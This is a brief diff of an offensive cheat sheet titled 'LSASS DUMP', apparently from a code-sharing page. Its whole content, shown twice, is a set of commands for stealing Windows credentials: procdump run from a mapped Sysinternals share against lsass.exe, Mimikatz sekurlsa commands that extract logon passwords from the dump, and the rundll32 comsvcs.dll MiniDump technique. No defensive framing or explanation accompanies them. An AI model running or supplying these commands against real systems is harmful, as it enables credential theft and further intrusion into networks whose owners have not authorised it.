ffcommax · February 18, 2020 06:29
diff --git a/LSASS DUMP b/LSASS DUMP
 net use Z: https://live.sysinternals.com
 Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 sekurlsa::minidump lsass.dmp
 sekurlsa::logonPasswords
 *******************************
 Dump LSASS with rundll32
 rundll32.exe C:\Windows\System32\comsvcs.dll #24 "<PID> lsass.dmp full"
 rundll32.exe comsvcs.dll #24 "<PID> lsass.dmp full"
	net use Z: https://live.sysinternals.com
	Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
	sekurlsa::minidump lsass.dmp
	sekurlsa::logonPasswords
	*******************************
	Dump LSASS with rundll32
	rundll32.exe C:\Windows\System32\comsvcs.dll #24 "<PID> lsass.dmp full"
	rundll32.exe comsvcs.dll #24 "<PID> lsass.dmp full"
No results found